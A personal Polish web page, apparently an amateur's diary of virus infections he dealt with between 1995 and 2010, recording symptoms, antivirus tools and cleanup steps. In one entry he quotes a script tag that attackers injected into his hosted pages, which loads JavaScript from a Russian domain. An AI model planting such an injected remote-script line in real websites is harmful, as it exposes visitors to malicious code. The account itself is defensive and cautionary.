Producenci i dystrybutorzy programów antywirusowych
Strony na temat wirusów
http://www.kki.net.pl/bytelord/virii.htm |
DIR2 | KACZOR | ANTITELEFONIK | BOBEK |
CIH | ETHAN | Opis CIH |
Zakupiłem w firmie
"Minix" komputer IBM 286.
Przez kilka dni
niektóre programy zachowywały się be z sensu. Po zbadaniu
programem MKS-Vir okazało się ,że na dysku 40 MB jest wirus DIR 2.
PO wyleczeniu dysku praca komputera wróciła do
normy. Trudno wyjaśnić ,
czy wirus dostałem z komputerem , czy go przeniosłem z dyskietek , z
których przegrywałem różne programy,
Rok 1995. Na moim komputerze w pracy Kierownik wykrył
wirusa Kaczor,.
Były jakieś niedomagania programów ,
ale specjalnie mi nie przeszkadzały , tylko rzuciły się w oczy
Kierownikowi , kiedy używał wyjątkowo mojego komputera.
Zarażony był między innymi program MEM.EXE , przegrałem go na
dyskietkę , próbowałem analizować pod debuggerem jego kod ,
ale później wyleczyłem program przy pomocy MKS-Vir.
Ten wirus później przeniósł się na
mój komputer w domu , i nagrał się na CD Romie w jednym z
programów. Nie da się go więc usunąć. Trzeba
uważać , żeby nie uruchomić tego programu. Ale nie zdążył wiele zaszkodzić.
Zdarzały się też wirusy Bravo na
dyskietkach , ale też dały się bezpiecznie usunąć.
Rok 1999. W styczniu znajomy przyniósł do pracy komputer z systemem Windows 98 , którego system nie mógł się uruchomić.
Po przebadaniu programem antywirusowym (Nazwy nie pamiętam) wykryto wirusy o nazwie podobnej do Antitelefonik. Później na wydrukach odnalazłem ,że tam był także wirus CIH. Udało mi się wyleczyć programem antywirusowym dysk i zainstalować ponownie Windows 98 z CD ROMu właściciela komputera. Nie formatowałem ponownie dysku. Nie wiem co się później działo z tym komputerem.
Rok 1999. w sierpniu mój komputer został zaatakowany kilkakrotnie przez wirusa Bobek. Przy pierwszym ataku z programu BITCOM.exe wystąpił błąd ochrony pamięci , nie wiedziałem , że to wirus. Wirus ten nie był wykrywany przez zagraniczne programy antywirusowe jak Antiviral Toolkit, bo jest to wirus polskiego obywatelstwa.
Drugi atak nastąpił w dniu 15
sierpnia. Podczas ataku komputer uruchomił
sygnał dźwiękowy i pojawił się ekran , którego treści nie
czytałem tylko czym prędzej wyłączałem komputer. Dopiero ściągnięty z Internetu
najnowszy MKS-Vir demo wykrył kilkanaście kopii wirusa Bobek na
dysku D ze starym systemem Windows 95 , który został
uszkodzony. Wirus zaatakował kilka programów , w
tym program Bitcom.exe i SndInit.exe. Wywołało to zakłócenia
w obsłudze karty dźwiękowej przez Windows , a nawet zaburzenia
pracy sterownika karty graficznej Virge , przez co obraz stawał się
całkiem nieczytelny.
Po usunięciu zawirusowanych plików ,
udało się na starym dysku systemowym przywrócić pracę
Windows 95. Przy uniknięciu formatowania nie pomagała ponowna
instalacja , trzeba było ponownie instalować z poziomu DOSa
kartę dźwiękową i ręcznie poprawiać pliki config.sys i
autoexec.bat. Już nie pamiętam szczegółów. Później ten
system Windows 95 popsuł się , ale mając na nowym dysku C Windows 98 nie
martwię się tym. Być może wirus Bobek coś namieszał w
strukturze tego dysku, ale już nie był tam wykrywany , natomiast został
odnaleziony w jednym z plików programu ściągniętym z
Internetu.
26 stycznia 2000. Na dysku mojego znajomego wykryłem przy pomocy
programu Inoculate z CDROMu CHIP 2/2000 bardzo groźnego wirusa
CIH Win 95. Było zawirusowane kilkadziesiąt programów z
systemu Windows . Ale wcześniej komputer nie zdradzał
objawów zakłóceń w pracy.
Program Inoculate swoim monitorowaniem
spowodował spowolnienie pracy komputera i podczas próby
uruchomienia Wincmd.exe pojawił się żółty kolor na tle
jego ekranu i potem Inoculate stwierdził Wirusa CIH i wykasował ten plik.
Znając opis wirusa , który może
popsuć BIOS zdecydowałem się na formatowanie programem Format
dysku C:. Na drugi dzień formatowałem dysk i
zainstalowałem na nowo Windows 98 PL. Instalacja przebiegła bez zakłóceń
, ale podczas uruchamiania Windows 98 obraz logo utrzymywał się
przez 15 min i zgasła dioda kontrolna sterownika dysku.
Zdecydowałem się zresetować komputer . I niestety po restarcie sytuacja się
powtarzała. Komputer ma tylko 16 MB . Wyraziłem przypuszczenie
, ze może to być słabośc sprzętu , dysk ma uszkodzone 1MB z
1GB , a Windows 98 PL , ma jeszcze drobne niedomagania ,( np.
przy wymianie dysku ZIP na drugi mylnie określa ilość wolnego
miejsca wg wartości określonej dla pierwszego). Badałem jeszcze dysk w trybie
awaryjnym i ponawiałem instalację Windows. Piszę szczegóły , bo nie wykluczam ,
że są to skutki działalności tego wirusa. W tym momencie sąsiad stracił
cierpliwość i nakazał zakończenie prac.
Nie dowiem się więc , czy wirus
został na 100 % zlikwidowany. Zajmie się tym inny spec. W każdym razie ostrzegam przed zakupem
komputerów w komisach .
Być może wirus został przegrany z
jakimiś grami komputerowymi.
Trzeba zachować ostrożność przy
wkładaniu dyskietki do nieznanego komputera , żeby nie
przenieść przez nią wirusa. Słyszałem od znajomych o jeszcze
jednym przypadku wirusa CIH _ Czernobyl w Jaśle , a także o
kilku przypadkach CIH u nieznanych osób w powiecie jasielskim.
Zdarzają się też fałszywe alarmy :
np. MKS Vir wykrywał konia trojańskiego w pliku *.ocx od
programu GOTOWORLD.exe. Taką odpowiedź otrzymałem od
specjalisty z MKS-Vir.
MKS-Vir również wywołuje fałszywy
alarm o uszkodzeniu przez wirusa programu , który ma tylko jeden
rozkaz - kod resetujący komputer (opcode 019). Niemniej pisałem
list (po angielsku) do specjalistów od programu Inoculate i oni
nie mają wątpliwości , że wirus był i może uszkodzić BIOS I BOOt sektor , co na razie chyba nie
miało miejsca.
Słyszałem od kolegi z pracy ,że
wirus CIH może wleźć do obrazu partycji. I wtedy zwykłe formatowanie go nie do
końca usuwa i może to zrobić tylko program antywirusowy. Mam też ściągnięte z Internetu 2
programy do wykrywania i usuwania jedynego wirusa CIH. Dyskietka ma swój system operacyjny. Mam
obawy , że podczas uruchamiania Z niej systemu i programu
antywirusowego nie miała ona blokady zapisu, ale ponieważ system był uruchamiany z
tej dyskietki powinna uniknąć zakażenia. Podczas instalacji MS DOS , instalator
zapisywał jakieś informacje na 3 dyskietce , ale było to już
po sformatowaniu dysku i system był uruchomiony z dyskietki. Na wszelki wypadek przebadałem te
dyskietki na swoim (bezpieczniej by było na cudzym) komputerze
programem Inoculate i TSCAN . Żadnego wirusa nie wykryto.
Po 2 latach rozmawiałem z żoną
właściciela tego komputera. Inny spec też nie naprawił tego
komputera, tylko polecił kupić nowy. Prawdopodobnie tutaj
najgorszą rzeczą były fizyczne uszkodzenia dysku. A wirus nie
zdążył zaszkodzić , tylko po sformatowaniu dysku nowy system
nie mógł się uruchomić z powodu tych uszkodzonych sektorów. Mogłaby pomóc wymiana dysku , ale to
by się opłaciło robić specjaliście od sprzętu
komputerowego.
12 kwietnia 2000 r. Dzisiaj na komputerze w pracy program MKS-VIR wykrył w moich dokumentach Wirusa Makra ETHAN 97 w dokumentach Microsoft Word 97 i w szablonie głównym Normal.dot. Program wyleczył pliki z wirusa , ale szablon Normal.dot nie nadaje się po wyleczeniu do użytku. Na szczęście mam kopie tego szablonu nie zakażone , więc da się go odtworzyć, Udało mi się wyskładować podczas pracy Worda kod źródłowy tego wirusa. Usadowił się on w otwartym dokumencie , nie umieszczam go na razie na stronie , bo tą drogą mógłby zostać używany do niecnych celów. Wysłałem go do twórców MKS-VIRa.
Grudzień 2001. Otrzymałem niechcianą pocztę wysłaną przez wirusa. Miał on 2 załączniki , w tym jeden większy o nazwie NEWS_DOC.DOC.scr. Zachowałem ten plik na dysku i zbadałem przez podgląd Notepadem były tam 2 pierwsze znaki MZ, co oznaczało ukryty program komputerowy. Skaner antywirusowy MKS-VIR ON Line wykrył wirusa o nazwie BadtransII. Jest to wirus Trojan , który może szpiegować komputer i wysyła swoje kopie do adresów z książki adresowej. Spreparowałem z ekranu pliku poczty plik tekstowy i wysłałem go do kilku znajomych jako ostrzeżenie. Sprowokowało to obronę antywirusową kilku serwerów, ale nowe badania przy pomocy zaktualizowanej wersji Innoculate Personal Edition i MKS-VIR nie wykryły już wirusów. Nie wykryłem też pliku Kernel.Exe , który ten wirus ma tworzyć .
7 kwietnia 2007. Na moim komputerze zalęgł się reklamiarz. Stało sie to po odwiedzeniu strony z programem Serial 2000. Ciągle otwiera strony, abyn ściągnąć oprogramowanie antywirusowe. Zmieniłem program antywirusowy na Panda , niby usuwa cookies i biblioteki dll, ale nie wszystko dał radę usunąć. Windows jest na partycji NTFS, którą trudno podejść z systemu Linux na CDRomie ratunkowym. Będę musiał przenieść drugi dysk z Windows z drugiego komputera i z niego wykasować te wredne biblioteki dll.
26 lutego 2008. Na moim starszym komputerze (Pentium III 600 Mhz) nagrał się ściągnięty ze stron internetowych wirus reklamiarz. Około godz. 22 oglądałem w przeglądarce Avant Browser serwisy zleceń internetowych. Uruchamiał on fałszywy alarm antywirusowy, który zachęcał do ściągnięcia programu antywirusowego. Adres internetowy tej strony był f5.cookingluck.com? i następowało uruchomienie kilkudziesięciu okien przeglądarki Avant Browser, aż do jej zablokowania.
|
|
|
|
|
Po wciśnięciu klawiszy Ctrl-Alt_Del w oknie Menedżera zadań Windows była widoczna aplikacja Windows Security Alert, którą dało sie wyłączyć. Podczas 3 dni zmagania sie z wirusem okazało sie, ze ogranicza on uprawnienia Administratora. Stał się niedostępny Control Panel. A w trybie awaryjnym administrator nie mógł w tym Panelu nic zdziałać. Na wskutek ograniczeń nie można było zatrzymać włączonego przez łącze USB Pendrive'a. Uruchamiałem Windows z innego dysku w tym komputerze i odnajdywałem pliki programów o dacie utworzenia 26.02.2008. Odnalazłem w katalogu Windows/System32 kilka programów i bibliotek DLL. Kasowałem je ręcznie z poziomu Windows uruchomionego z innego dysku. Wtedy zwróciłem uwagę na plik FTPDLL.DLL. Później szukałem informacji o tym adresie f5.cookingluck.com? i odnalazłem nazwę wirusa Smitfraud. Ściągnąłem ze strony www.mks.com.pl skaner antywirusowy online. Wykrył on pliki wirusa c:\windows\shell.exe, c:\windows\system32\printer.exe i c:\windows\system32\spoolvs.exe. W menu autostart występował program findfast.exe. Ich nazwy sugerowały że są plikami systemowymi. Ich data zapisu była rok 2005 miesiąc maj. Wirus dokonał zmian w rejestrach, co juz zgłaszał podczas ataku MKS-Vir_2k7. Niestety nie był aktualizowany i nie wykrywał plików wirusa. Usuwanie zarażonych plików nie pomagalo, po restarcie komputera wirus się odnawiał i pliki na nowo powstawały. Ściągnąłem z internetu kilka programów do likwidacji Koni trojańskich. Uruchomiłem programy XOFT SpySE oraz SPYBOOT SearchDestroy.
Wykonały one analizę rejestrów i wykryły podejrzane wpisy w rejestrze. Program Xoft SpySE w wersji darmowej nie usuwa wirusów. Program SPYBOOT SearchDestroy wykrył zmiany w rejestrze. Przy pomocy informacji z wyszukiwarek za wirusy uznałem Virtumonde i Win32.BHO.je. Te wpisy nakazałem usunąć. Ale to jeszcze nie usunęło wszystkich pików Wirusa. Na wskutek zmian w rejestrach System Windows nie mógł sie do końca uruchomić (program Explorer). Zdecydowałem się na przywrócenie rejestrów do stanu początkowego po instalacji i jak to nie pomogło to wykonałem ponowną instalację systemu Windows XP Z CD Romu. Wtedy wirus się nie pojawiał, ale podczas przeglądania katalogów próbowałem usunąć pozostały w nieczynnym Menu Start program FindFast.exe. Zniknęły juz ograniczenia uprawnień administratora. Ale program zgłaszał sie jako plik z ochroną zapisu i być może niechcący go uruchomiłem i nastąpiła wtórna aktywacja wirusa. Odnalazłem w Internecie inne programy do usuwania Spyware: SDFix i HijacThis. Po wydrukowaniu na drugim komputerze opisu uruchomiłem program SDFix w trybie awaryjnym. ten program skutecznie usunął wszystkie pliki i wpisy w rejestrze wirusa. Komputer został uwolniony od wrednego wirusa. Załączam raport z usuwania wirusa.
Report.txt.
21 października 2008. Na moim
koncie http://www.rafaljak.phg.pl
jakiś rosyjski wirus zmienił mój kod na ok 300 plikach .html i .php. Dokleił kod
podłączający do jakiś rosyjskich Java Scriptów. Wyszukiwarka Google umiesciłą
moją strone na liście stron niebezpiecznych. Znajomy z Jasła powiadomił mnie
pocztą elektroniczna. Na razie rozpoznałem na serwerze ponad 300 plików o dacie
zapisu 17.10.2008 godziny między 9.45 , a 10 z minutami. Skonsultowałem się z
administratorem serwera www.phg.pl, który
polecił usunięcie zmienionych przez wirusa stron, przebadanie komputera przez
program antywirusowy i zmianę haseł dostępu do konta. Na razie usunąłem pliki z
rozpoznanymi zmianami i zleciłem systemowi Google ponowne sprawdzenie mojej
witryny. Uruchomiłem też MKS Skaner Online.
Przykład kodu dodanego przez wirusa.:<script src=http://www.nmr43.ru/fgg.js></script>.
Takie wpisy występowały wielokrotnie i powodowały podejrzane zwiększenie
wielkości pliku. Nie radzę odwiedzanie tego adresu.
Skaner Online na razie wykrył tylko fałszywe alarmy program: vhost.exe w
katalogach DEBUG programów binarnych powstałych z kompilacji w Visual
Basic 2005.
Później się okazało, że na drugim koncie
http://www.rafalwit.ota.pl o tej samej godzinie ten sam wirus też zmienił
strony WWW.
27 stycznia 2010. Otrzymałem email z
załącznikiem plik UPS_invoice_NR45675.exe. Skaner
online Kasperski Antywirus
stwierdził że to wirus.
Patrz : kasperski_skan.htm .
6 lutego 2010. Dostałem powiadomienie od
znajomego, że moja strona jest rozpoznawana przez dodatek Firefox WOT jako
witryna nie budząca zaufania. Okazało się, ze było zgłoszenie o umieszczeniu na
moim koncie przez włamanie pliku wirusa antigo_88.scr . Ten plik
Kasperski Antywirus
online rozpoznał jako trojana.
Patrz: scanforvirus2.htm
http://www.acunetix.com/cross-site-scripting/links.htm link do programu antywirusowego zgłoszonego przez specjalistę z Brazylii.
http://wortal.php.pl/wortal/artykuly/bezpieczenstwo/podstawy_bezpieczenstwa_skryptow_php